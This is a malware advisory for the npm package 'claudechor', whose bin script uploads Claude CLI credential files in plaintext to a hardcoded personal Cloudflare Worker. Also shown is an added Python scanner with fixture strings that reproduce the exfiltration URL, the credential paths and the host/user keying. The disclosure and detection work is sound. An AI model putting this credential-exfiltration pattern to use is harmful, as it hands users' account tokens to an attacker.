CRITICAL npm Malware

Malicious code in claudechor (npm)

MAL-2026-5717

Published · Modified

Description


Source: amazon-inspector (4a9cbb36cf7ed82685830b5d3a2b341bff9ef86e2688842d1f54259b2b6fb533)

The package's bin entry reads installer-owned Claude credential files (~/.claude/.credentials.json and ~/.claude.json) — written by Anthropic's official Claude CLI, not by this package — and POSTs their contents in plaintext JSON to a hardcoded endpoint https://tfer.jha-anurag2017.workers.dev (a personal Cloudflare Worker unrelated to Anthropic). index.js:9 hardcodes WORKER_URL; index.js:78-83 reads the two credential files and calls request("POST", "/${name}", { data: JSON.stringify(files) }) keyed by <hostname>-<username> (collected via os.hostname() / os.userInfo() at index.js:146). The default invocation claudechor with no arguments runs cmdPush immediately, with no confirmation. AES-256-GCM encrypt/decrypt helpers are defined in the file but are dead code in the push path, so the OAuth/session tokens leave the host unencrypted at the application layer. The README is effectively empty (# tfer) and nothing in the package metadata discloses that the bin uploads third-party credentials to a personal endpoint. Anyone who runs the CLI surrenders their Anthropic account access to the package author.
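The pattern described above (a bin script that reads installer-owned Claude credential files and also carries a hardcoded outbound endpoint) can be screened for statically before a package is ever executed. The following scanner is an added defender-side example written for this page; it is not part of the advisory, of Amazon Inspector, or of any npm tooling. It walks an unpacked package directory, resolves the package.json `bin` entries, and flags any script that references `~/.claude/.credentials.json` or `~/.claude.json` together with an egress indicator (an `https://` literal, `fetch(`, or `http(s).request(`). The package name `fixture-pkg`, the fixture sources, and the severity labels are constructed for the demonstration; the endpoint string in the fixture is the one named in the advisory.

```python
"""Static indicator scan for npm packages whose scripts read Claude CLI
credential files and can also send data off-host (added example, not
part of the advisory)."""
import json
import os
import re
import tempfile
from pathlib import Path

# Installer-owned credential files named in the advisory. The shorter
# forms catch path.join(os.homedir(), ".claude", ".credentials.json").
CREDENTIAL_MARKERS = (".claude/.credentials.json", ".credentials.json", ".claude.json")

# Signs that a script can reach the network.
EGRESS_PATTERNS = [
    re.compile(r"https?\.request\s*\("),
    re.compile(r"\bfetch\s*\("),
    re.compile(r"https?://[^\s'\"`)]+"),
]
URL_PATTERN = re.compile(r"https?://[^\s'\"`)]+")

# Host/user identity calls the advisory says keyed the upload.
IDENTITY_MARKERS = ("os.hostname(", "os.userInfo(")


def bin_entries(pkg_json: dict) -> set:
    """Return the normalised relative paths listed under package.json 'bin'."""
    bin_field = pkg_json.get("bin", {})
    if isinstance(bin_field, str):
        return {os.path.normpath(bin_field)}
    return {os.path.normpath(v) for v in bin_field.values()}


def scan_file(path: Path) -> dict:
    """Collect credential, egress and identity indicators from one script."""
    text = path.read_text(errors="replace")
    return {
        "credential_refs": [m for m in CREDENTIAL_MARKERS if m in text],
        "egress": [p.pattern for p in EGRESS_PATTERNS if p.search(text)],
        "urls": sorted(set(URL_PATTERN.findall(text))),
        "identity": [m for m in IDENTITY_MARKERS if m in text],
    }


def scan_package(pkg_dir) -> list:
    """Flag scripts that touch credential files; escalate when they can
    also reach the network, and again when they are the package's bin."""
    pkg_dir = Path(pkg_dir)
    pkg_json = json.loads((pkg_dir / "package.json").read_text())
    bins = bin_entries(pkg_json)
    findings = []
    for js in pkg_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue
        rel = os.path.normpath(js.relative_to(pkg_dir).as_posix())
        result = scan_file(js)
        if not result["credential_refs"]:
            continue  # reading no credential file: out of scope here
        severity = "HIGH" if result["egress"] else "MEDIUM"
        is_bin = rel in bins
        if is_bin and severity == "HIGH":
            severity = "CRITICAL"  # runs on plain invocation, like cmdPush
        findings.append({"file": rel, "is_bin": is_bin, "severity": severity, **result})
    return findings


# Constructed fixtures. Neither is a working program; they are string
# content that reproduces the indicators the scanner looks for.
EXFIL_INDEX_JS = '''const os = require("os"), path = require("path");
const WORKER_URL = "https://tfer.jha-anurag2017.workers.dev";
const files = {
  creds: path.join(os.homedir(), ".claude", ".credentials.json"),
  config: path.join(os.homedir(), ".claude.json"),
};
const name = `${os.hostname()}-${os.userInfo().username}`;
'''
LOCAL_INDEX_JS = '''const os = require("os"), path = require("path"), fs = require("fs");
// Reads the user's own Claude CLI config and prints a field locally.
const cfg = JSON.parse(fs.readFileSync(path.join(os.homedir(), ".claude.json"), "utf8"));
console.log(cfg.model);
'''


def build_fixture(exfiltrates: bool) -> str:
    """Write a throwaway package ('fixture-pkg', a placeholder name) to a temp dir."""
    d = Path(tempfile.mkdtemp())
    (d / "package.json").write_text(json.dumps(
        {"name": "fixture-pkg", "version": "0.0.0", "bin": {"fixture-pkg": "./index.js"}}))
    (d / "index.js").write_text(EXFIL_INDEX_JS if exfiltrates else LOCAL_INDEX_JS)
    return str(d)


if __name__ == "__main__":
    for flag in (True, False):
        for f in scan_package(build_fixture(flag)):
            print(f["severity"], f["file"], f["credential_refs"], f["urls"])
```

The scan is deliberately coarse: it trades false positives (a legitimate local config viewer is reported at MEDIUM) for not missing the combination that matters, which is a credential-file read next to any network reach in the script that runs on plain invocation. Pair it with the runtime check the advisory implies: an installed `bin` that is invoked with no arguments should not be making outbound requests at all.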
